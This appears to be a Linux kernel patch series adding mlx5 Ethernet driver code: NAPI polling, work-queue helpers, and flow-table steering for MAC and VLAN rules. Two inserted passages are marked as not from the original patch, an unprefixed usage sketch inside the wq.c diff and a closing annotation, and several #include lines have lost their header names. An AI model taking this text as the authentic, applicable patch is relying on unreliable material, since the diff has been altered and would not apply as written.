+ clear_bit(MLX5E_CHANNEL_NAPI_SCHED, &c->flags); + + for (i = 0; i < c->num_tc; i++) + busy |= mlx5e_poll_tx_cq(&c->sq[i].cq); + + busy |= mlx5e_poll_rx_cq(&c->rq.cq, budget); + + busy |= mlx5e_post_rx_wqes(c->rq.cq.sqrq); + + if (busy) + return budget; + + napi_complete(napi); + + /* avoid losing completion event during/after polling cqs */ + if (test_bit(MLX5E_CHANNEL_NAPI_SCHED, &c->flags)) { + napi_schedule(napi); + return 0; + } + + for (i = 0; i < c->num_tc; i++) + mlx5e_cq_arm(&c->sq[i].cq); + mlx5e_cq_arm(&c->rq.cq); + + return 0; +} + +void mlx5e_completion_event(struct mlx5_core_cq *mcq) +{ + struct mlx5e_cq *cq = container_of(mcq, struct mlx5e_cq, mcq); + + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + set_bit(MLX5E_CHANNEL_NAPI_SCHED, &cq->channel->flags); + barrier(); + napi_schedule(cq->napi); +} + +void mlx5e_cq_error_event(struct mlx5_core_cq *mcq, enum mlx5_event event) +{ + struct mlx5e_cq *cq = container_of(mcq, struct mlx5e_cq, mcq); + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct net_device *netdev = priv->netdev; + + netdev_err(netdev, "%s: cqn=0x%.6x event=0x%.2x\n", + __func__, mcq->cqn, event); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/wq.c b/drivers/net/ethernet/mellanox/mlx5/core/wq.c new file mode 100644 index 000000000000..8388411582cf --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/wq.c @@ -0,0 +1,183 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. 
+ * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include "wq.h" +#include "mlx5_core.h" + +u32 mlx5_wq_cyc_get_size(struct mlx5_wq_cyc *wq) +{ + return (u32)wq->sz_m1 + 1; +} + +u32 mlx5_cqwq_get_size(struct mlx5_cqwq *wq) +{ + return wq->sz_m1 + 1; +} + +u32 mlx5_wq_ll_get_size(struct mlx5_wq_ll *wq) +{ + return (u32)wq->sz_m1 + 1; +} + +static u32 mlx5_wq_cyc_get_byte_size(struct mlx5_wq_cyc *wq) +{ + return mlx5_wq_cyc_get_size(wq) << wq->log_stride; +} + +static u32 mlx5_cqwq_get_byte_size(struct mlx5_cqwq *wq) +{ + return mlx5_cqwq_get_size(wq) << wq->log_stride; +} + +static u32 mlx5_wq_ll_get_byte_size(struct mlx5_wq_ll *wq) +{ + return mlx5_wq_ll_get_size(wq) << wq->log_stride; +} + +int mlx5_wq_cyc_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_cyc *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + int err; + + wq->log_stride = MLX5_GET(wq, wqc, log_wq_stride); + wq->sz_m1 = (1 << MLX5_GET(wq, wqc, log_wq_sz)) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_wq_cyc_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} + +int mlx5_cqwq_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *cqc, struct mlx5_cqwq *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + int err; + + wq->log_stride = 6 + MLX5_GET(cqc, cqc, cqe_sz); + wq->log_sz = MLX5_GET(cqc, cqc, log_cq_size); + wq->sz_m1 = (1 << wq->log_sz) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_cqwq_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} 
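/*
 * Illustrative usage sketch (not taken from this patch): a caller is
 * expected to fill a "wq" parameter block with the stride and size
 * fields that mlx5_wq_cyc_create() reads back via MLX5_GET() above, and
 * to pair the create call with mlx5_wq_destroy(). The log values and
 * mlx5_wq_param settings below are placeholders, not values from the
 * mlx5 driver.
 */
static int example_create_cyc_wq(struct mlx5_core_dev *mdev,
				 struct mlx5_wq_cyc *wq,
				 struct mlx5_wq_ctrl *wq_ctrl)
{
	u32 wqc[MLX5_ST_SZ_DW(wq)] = {0};
	struct mlx5_wq_param param = {
		.linear = 1,	/* assumed: physically contiguous buffer */
		.numa	= 0,	/* assumed: NUMA node hint */
	};

	MLX5_SET(wq, wqc, log_wq_stride, 6);	/* example: 64B WQE stride */
	MLX5_SET(wq, wqc, log_wq_sz, 10);	/* example: 1024 entries */

	return mlx5_wq_cyc_create(mdev, &param, wqc, wq, wq_ctrl);
	/* ...and on teardown: mlx5_wq_destroy(wq_ctrl); */
}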
+ +int mlx5_wq_ll_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_ll *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + struct mlx5_wqe_srq_next_seg *next_seg; + int err; + int i; + + wq->log_stride = MLX5_GET(wq, wqc, log_wq_stride); + wq->sz_m1 = (1 << MLX5_GET(wq, wqc, log_wq_sz)) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_wq_ll_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + for (i = 0; i < wq->sz_m1; i++) { + next_seg = mlx5_wq_ll_get_wqe(wq, i); + next_seg->next_wqe_index = cpu_to_be16(i + 1); + } + next_seg = mlx5_wq_ll_get_wqe(wq, i); + wq->tail_next = &next_seg->next_wqe_index; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} + +void mlx5_wq_destroy(struct mlx5_wq_ctrl *wq_ctrl) +{ + mlx5_buf_free(wq_ctrl->mdev, &wq_ctrl->buf); + mlx5_db_free(wq_ctrl->mdev, &wq_ctrl->db); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/wq.h b/drivers/net/ethernet/mellanox/mlx5/core/wq.h new file mode 100644 index 000000000000..e0ddd69fb429 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/wq.h @@ -0,0 +1,171 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#ifndef __MLX5_WQ_H__ +#define __MLX5_WQ_H__ + +#include + +struct mlx5_wq_param { + int linear; + int numa; +}; + +struct mlx5_wq_ctrl { + struct mlx5_core_dev *mdev; + struct mlx5_buf buf; + struct mlx5_db db; +}; + +struct mlx5_wq_cyc { + void *buf; + __be32 *db; + u16 sz_m1; + u8 log_stride; +}; + +struct mlx5_cqwq { + void *buf; + __be32 *db; + u32 sz_m1; + u32 cc; /* consumer counter */ + u8 log_sz; + u8 log_stride; +}; + +struct mlx5_wq_ll { + void *buf; + __be32 *db; + __be16 *tail_next; + u16 sz_m1; + u16 head; + u16 wqe_ctr; + u16 cur_sz; + u8 log_stride; +}; + +int mlx5_wq_cyc_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_cyc *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_wq_cyc_get_size(struct mlx5_wq_cyc *wq); + +int mlx5_cqwq_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *cqc, struct mlx5_cqwq *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_cqwq_get_size(struct mlx5_cqwq *wq); + +int mlx5_wq_ll_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_ll *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_wq_ll_get_size(struct mlx5_wq_ll *wq); + +void mlx5_wq_destroy(struct mlx5_wq_ctrl *wq_ctrl); + +static inline u16 mlx5_wq_cyc_ctr2ix(struct mlx5_wq_cyc *wq, u16 ctr) +{ + return ctr & wq->sz_m1; +} + +static inline void *mlx5_wq_cyc_get_wqe(struct mlx5_wq_cyc *wq, u16 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline int mlx5_wq_cyc_cc_bigger(u16 cc1, u16 cc2) +{ + int equal = (cc1 == cc2); + int smaller = 0x8000 & (cc1 - cc2); + + return !equal && !smaller; +} + +static inline u32 mlx5_cqwq_get_ci(struct mlx5_cqwq *wq) +{ + return wq->cc & wq->sz_m1; +} + +static inline void *mlx5_cqwq_get_wqe(struct mlx5_cqwq *wq, u32 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline u32 mlx5_cqwq_get_wrap_cnt(struct mlx5_cqwq *wq) +{ + return wq->cc >> wq->log_sz; +} + +static inline void mlx5_cqwq_pop(struct mlx5_cqwq *wq) +{ + wq->cc++; +} + +static inline void mlx5_cqwq_update_db_record(struct mlx5_cqwq *wq) +{ + *wq->db = cpu_to_be32(wq->cc & 0xffffff); +} + +static inline int mlx5_wq_ll_is_full(struct mlx5_wq_ll *wq) +{ + return wq->cur_sz == wq->sz_m1; +} + +static inline int mlx5_wq_ll_is_empty(struct mlx5_wq_ll *wq) +{ + return !wq->cur_sz; +} + +static inline void *mlx5_wq_ll_get_wqe(struct mlx5_wq_ll *wq, u16 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline void mlx5_wq_ll_push(struct mlx5_wq_ll *wq, u16 head_next) +{ + wq->head = head_next; + wq->wqe_ctr++; + wq->cur_sz++; +} + +static inline void mlx5_wq_ll_pop(struct mlx5_wq_ll *wq, __be16 ix, + __be16 *next_tail_next) +{ + *wq->tail_next = ix; + wq->tail_next = next_tail_next; + wq->cur_sz--; +} + +static inline void mlx5_wq_ll_update_db_record(struct mlx5_wq_ll *wq) +{ + *wq->db = cpu_to_be32(wq->wqe_ctr); +} + +#endif /* __MLX5_WQ_H__ */ From afb736e9330ad6b2b6935d2f53ded784eb73f12d Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:47 +0300 Subject: [PATCH 501/872] net/mlx5: Ethernet resource handling files This patch contains the resource handling files: - flow_table.c: This file contains the code to handle the low level API to configure hardware flow table. It is separated from the flow_table_en.c, because it will be used in the future by Raw Ethernet QP in mlx5_ib too. - en_flow_table.[ch]: Ethernet flow steering handling. The flow table object contain a mapping between flow specs and TIRs. 
This mechanism will be used also to configure e-switch in the future, when SR-IOV support will be added. - transobj.[ch] - Low level functions to create/modify/destroy the transport objects: RQ/SQ/TIR/TIS - vport.[ch] - Handle attributes of a virtual port (vPort) in the embedded switch. Currently this switch is a passthrough, until SR-IOV support will be added. Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../mellanox/mlx5/core/en_flow_table.c | 858 ++++++++++++++++++ .../ethernet/mellanox/mlx5/core/flow_table.c | 422 +++++++++ .../ethernet/mellanox/mlx5/core/transobj.c | 169 ++++ .../ethernet/mellanox/mlx5/core/transobj.h | 47 + .../net/ethernet/mellanox/mlx5/core/vport.c | 84 ++ .../net/ethernet/mellanox/mlx5/core/vport.h | 41 + include/linux/mlx5/flow_table.h | 54 ++ 7 files changed, 1675 insertions(+) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/flow_table.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/transobj.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/transobj.h create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/vport.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/vport.h create mode 100644 include/linux/mlx5/flow_table.h diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c new file mode 100644 index 000000000000..6feebda4b3e4 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c @@ -0,0 +1,858 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include +#include +#include +#include +#include +#include "en.h" + +enum { + MLX5E_FULLMATCH = 0, + MLX5E_ALLMULTI = 1, + MLX5E_PROMISC = 2, +}; + +enum { + MLX5E_UC = 0, + MLX5E_MC_IPV4 = 1, + MLX5E_MC_IPV6 = 2, + MLX5E_MC_OTHER = 3, +}; + +enum { + MLX5E_ACTION_NONE = 0, + MLX5E_ACTION_ADD = 1, + MLX5E_ACTION_DEL = 2, +}; + +struct mlx5e_eth_addr_hash_node { + struct hlist_node hlist; + u8 action; + struct mlx5e_eth_addr_info ai; +}; + +static inline int mlx5e_hash_eth_addr(u8 *addr) +{ + return addr[5]; +} + +static void mlx5e_add_eth_addr_to_hash(struct hlist_head *hash, u8 *addr) +{ + struct mlx5e_eth_addr_hash_node *hn; + int ix = mlx5e_hash_eth_addr(addr); + int found = 0; + + hlist_for_each_entry(hn, &hash[ix], hlist) + if (ether_addr_equal_64bits(hn->ai.addr, addr)) { + found = 1; + break; + } + + if (found) { + hn->action = MLX5E_ACTION_NONE; + return; + } + + hn = kzalloc(sizeof(*hn), GFP_ATOMIC); + if (!hn) + return; + + ether_addr_copy(hn->ai.addr, addr); + hn->action = MLX5E_ACTION_ADD; + + hlist_add_head(&hn->hlist, &hash[ix]); +} + +static void mlx5e_del_eth_addr_from_hash(struct mlx5e_eth_addr_hash_node *hn) +{ + hlist_del(&hn->hlist); + kfree(hn); +} + +static void mlx5e_del_eth_addr_from_flow_table(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai) +{ + void *ft = priv->ft.main; + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6_TCP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6_TCP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4_TCP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4_TCP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6_UDP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6_UDP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4_UDP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4_UDP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4]); + + if (ai->tt_vec & (1 << MLX5E_TT_ANY)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_ANY]); +} + +static int mlx5e_get_eth_addr_type(u8 *addr) +{ + if (is_unicast_ether_addr(addr)) + return MLX5E_UC; + + if ((addr[0] == 0x01) && + (addr[1] == 0x00) && + (addr[2] == 0x5e) && + !(addr[3] & 0x80)) + return MLX5E_MC_IPV4; + + if ((addr[0] == 0x33) && + (addr[1] == 0x33)) + return MLX5E_MC_IPV6; + + return MLX5E_MC_OTHER; +} + +static u32 mlx5e_get_tt_vec(struct mlx5e_eth_addr_info *ai, int type) +{ + int eth_addr_type; + u32 ret; + + switch (type) { + case MLX5E_FULLMATCH: + eth_addr_type = mlx5e_get_eth_addr_type(ai->addr); + switch (eth_addr_type) { + case MLX5E_UC: + ret = + (1 << MLX5E_TT_IPV4_TCP) | + (1 << MLX5E_TT_IPV6_TCP) | + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << MLX5E_TT_ANY) | + 0; + break; + + case MLX5E_MC_IPV4: + ret = + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV4) | + 0; + break; + + case MLX5E_MC_IPV6: + ret = + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV6) | + 0; + break; + + case MLX5E_MC_OTHER: + ret = + (1 << MLX5E_TT_ANY) | + 0; + break; + } + + break; + + case MLX5E_ALLMULTI: + ret = + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << MLX5E_TT_ANY) | + 0; + break; + + default: /* MLX5E_PROMISC */ + ret = + (1 << MLX5E_TT_IPV4_TCP) | + (1 << MLX5E_TT_IPV6_TCP) | + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << 
MLX5E_TT_ANY) | + 0; + break; + } + + return ret; +} + +static int __mlx5e_add_eth_addr_rule(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai, int type, + void *flow_context, void *match_criteria) +{ + u8 match_criteria_enable = 0; + void *match_value; + void *dest; + u8 *dmac; + u8 *match_criteria_dmac; + void *ft = priv->ft.main; + u32 *tirn = priv->tirn; + u32 tt_vec; + int err; + + match_value = MLX5_ADDR_OF(flow_context, flow_context, match_value); + dmac = MLX5_ADDR_OF(fte_match_param, match_value, + outer_headers.dmac_47_16); + match_criteria_dmac = MLX5_ADDR_OF(fte_match_param, match_criteria, + outer_headers.dmac_47_16); + dest = MLX5_ADDR_OF(flow_context, flow_context, destination); + + MLX5_SET(flow_context, flow_context, action, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST); + MLX5_SET(flow_context, flow_context, destination_list_size, 1); + MLX5_SET(dest_format_struct, dest, destination_type, + MLX5_FLOW_CONTEXT_DEST_TYPE_TIR); + + switch (type) { + case MLX5E_FULLMATCH: + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + memset(match_criteria_dmac, 0xff, ETH_ALEN); + ether_addr_copy(dmac, ai->addr); + break; + + case MLX5E_ALLMULTI: + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + match_criteria_dmac[0] = 0x01; + dmac[0] = 0x01; + break; + + case MLX5E_PROMISC: + break; + } + + tt_vec = mlx5e_get_tt_vec(ai, type); + + if (tt_vec & (1 << MLX5E_TT_ANY)) { + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_ANY]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_ANY]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_ANY); + } + + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.ethertype); + + if (tt_vec & (1 << MLX5E_TT_IPV4)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV6]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6); + } + + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.ip_protocol); + MLX5_SET(fte_match_param, match_value, outer_headers.ip_protocol, + IPPROTO_UDP); + + if (tt_vec & (1 << MLX5E_TT_IPV4_UDP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4_UDP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4_UDP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4_UDP); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6_UDP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + 
tirn[MLX5E_TT_IPV6_UDP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6_UDP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6_UDP); + } + + MLX5_SET(fte_match_param, match_value, outer_headers.ip_protocol, + IPPROTO_TCP); + + if (tt_vec & (1 << MLX5E_TT_IPV4_TCP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IP); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV4_TCP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV4_TCP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV4_TCP); + } + + if (tt_vec & (1 << MLX5E_TT_IPV6_TCP)) { + MLX5_SET(fte_match_param, match_value, outer_headers.ethertype, + ETH_P_IPV6); + MLX5_SET(dest_format_struct, dest, destination_id, + tirn[MLX5E_TT_IPV6_TCP]); + err = mlx5_add_flow_table_entry(ft, match_criteria_enable, + match_criteria, flow_context, + &ai->ft_ix[MLX5E_TT_IPV6_TCP]); + if (err) { + mlx5e_del_eth_addr_from_flow_table(priv, ai); + return err; + } + ai->tt_vec |= (1 << MLX5E_TT_IPV6_TCP); + } + + return 0; +} + +static int mlx5e_add_eth_addr_rule(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai, int type) +{ + u32 *flow_context; + u32 *match_criteria; + int err; + + flow_context = mlx5_vzalloc(MLX5_ST_SZ_BYTES(flow_context) + + MLX5_ST_SZ_BYTES(dest_format_struct)); + match_criteria = mlx5_vzalloc(MLX5_ST_SZ_BYTES(fte_match_param)); + if (!flow_context || !match_criteria) { + netdev_err(priv->netdev, "%s: alloc failed\n", __func__); + err = -ENOMEM; + goto add_eth_addr_rule_out; + } + + err = __mlx5e_add_eth_addr_rule(priv, ai, type, flow_context, + match_criteria); + if (err) + netdev_err(priv->netdev, "%s: failed\n", __func__); + +add_eth_addr_rule_out: + kvfree(match_criteria); + kvfree(flow_context); + return err; +} + +enum mlx5e_vlan_rule_type { + MLX5E_VLAN_RULE_TYPE_UNTAGGED, + MLX5E_VLAN_RULE_TYPE_ANY_VID, + MLX5E_VLAN_RULE_TYPE_MATCH_VID, +}; + +static int mlx5e_add_vlan_rule(struct mlx5e_priv *priv, + enum mlx5e_vlan_rule_type rule_type, u16 vid) +{ + u8 match_criteria_enable = 0; + u32 *flow_context; + void *match_value; + void *dest; + u32 *match_criteria; + u32 *ft_ix; + int err; + + flow_context = mlx5_vzalloc(MLX5_ST_SZ_BYTES(flow_context) + + MLX5_ST_SZ_BYTES(dest_format_struct)); + match_criteria = mlx5_vzalloc(MLX5_ST_SZ_BYTES(fte_match_param)); + if (!flow_context || !match_criteria) { + netdev_err(priv->netdev, "%s: alloc failed\n", __func__); + err = -ENOMEM; + goto add_vlan_rule_out; + } + match_value = MLX5_ADDR_OF(flow_context, flow_context, match_value); + dest = MLX5_ADDR_OF(flow_context, flow_context, destination); + + MLX5_SET(flow_context, flow_context, action, + MLX5_FLOW_CONTEXT_ACTION_FWD_DEST); + MLX5_SET(flow_context, flow_context, destination_list_size, 1); + MLX5_SET(dest_format_struct, dest, destination_type, + MLX5_FLOW_CONTEXT_DEST_TYPE_FLOW_TABLE); + MLX5_SET(dest_format_struct, dest, destination_id, + mlx5_get_flow_table_id(priv->ft.main)); + + match_criteria_enable = MLX5_MATCH_OUTER_HEADERS; + MLX5_SET_TO_ONES(fte_match_param, match_criteria, + outer_headers.vlan_tag); + + switch (rule_type) { + case MLX5E_VLAN_RULE_TYPE_UNTAGGED: + ft_ix = &priv->vlan.untagged_rule_ft_ix; + break; + case MLX5E_VLAN_RULE_TYPE_ANY_VID: + ft_ix = &priv->vlan.any_vlan_rule_ft_ix; + 
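		/*
		 * Annotation (not in the original patch): vlan_tag is part of
		 * the match criteria for every rule built here, so setting it
		 * to 1 in the match value selects tagged frames.  ANY_VID
		 * stops at that, MATCH_VID below additionally matches
		 * first_vid against the requested VLAN id, and UNTAGGED
		 * leaves the value at 0 so only untagged frames hit the rule.
		 */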
